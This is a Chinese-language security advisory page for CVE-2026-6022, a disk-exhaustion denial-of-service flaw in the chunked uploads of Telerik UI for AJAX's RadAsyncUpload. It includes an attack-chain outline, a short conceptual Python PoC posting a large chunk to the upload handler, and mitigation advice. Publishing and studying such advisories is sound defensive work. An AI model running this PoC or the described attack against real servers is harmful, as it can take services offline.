IPBUF安全漏洞报告
English
CVE-2026-6022 CVSS 7.5 高危

CVE-2026-6022 Progress Telerik UI资源耗尽漏洞

披露日期: 2026-04-22
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-6022
漏洞类型
资源耗尽
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Progress® Telerik® UI for AJAX

相关标签

资源耗尽拒绝服务Progress TelerikRadAsyncUploadCVE-2026-6022

漏洞概述

Progress Telerik UI for AJAX 2026.1.421之前版本存在安全漏洞。RadAsyncUpload组件在处理分块上传时,由于缺少对累积文件大小的强制执行检查,允许上传文件超过配置的最大限制。攻击者可利用此缺陷耗尽服务器磁盘空间,导致拒绝服务。

技术细节

该漏洞源于Progress Telerik UI for AJAX中RadAsyncUpload组件的实现逻辑缺陷。当组件启用分块上传时,旨在允许大文件分片传输。漏洞在于重组分块的过程中,未正确校验所有分块的总累积大小是否超过管理员配置的最大文件大小限制(MaxFileSize)。攻击者可以通过构造特殊的HTTP POST请求,向RadAsyncUpload处理程序(通常为RadAsyncUploadHandler.ashx)发送大量数据分块。由于缺乏累计检查,服务器会持续接收并写入磁盘,直到磁盘空间耗尽,造成系统资源枯竭和服务不可用。

攻击链分析

STEP 1
侦察
攻击者识别目标网站是否使用了Progress Telerik UI for AJAX组件,并定位到RadAsyncUpload的处理接口。
STEP 2
漏洞利用
攻击者编写脚本,向RadAsyncUpload接口发送分块上传请求。在请求中故意绕过单次大小检查,持续发送大量数据分块。
STEP 3
资源耗尽
服务器端在重组文件时未执行累积大小校验,持续将接收到的分块写入磁盘,导致磁盘空间被恶意数据填满。
STEP 4
拒绝服务
由于磁盘空间耗尽,服务器无法写入日志或临时文件,最终导致Web服务崩溃或无法响应正常请求。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (Example) # The endpoint usually looks like: /Telerik.Web.UI.WebResource.axd?type=rau or specific handler target_url = "http://target-site/Telerik.Web.UI.WebResource.axd?type=rau" # Headers mimicking a Telerik chunked upload headers = { "User-Agent": "Mozilla/5.0", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary", "X-File-Name": "exploit.dat", "X-File-Size": "999999999999" # Misleading size or bypass logic } # Simulate sending chunks to exhaust disk # Note: This is a conceptual PoC. Real exploitation depends on specific version parameters. print("Sending malicious chunks to exhaust disk space...") try: # Sending a large chunk data = "A" * 10 * 1024 * 1024 # 10MB chunk # In a real scenario, loop this and manipulate metadata to bypass single chunk checks response = requests.post(target_url, headers=headers, data=data) print(f"Response Status: {response.status_code}") except Exception as e: print(f"Error: {e}")

影响范围

Progress® Telerik® UI for AJAX < 2026.1.421

防御指南

临时缓解措施
如果无法立即升级,建议在应用防火墙(WAF)中添加规则,拦截对RadAsyncUpload处理程序的异常大流量请求,或临时禁用该上传功能。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表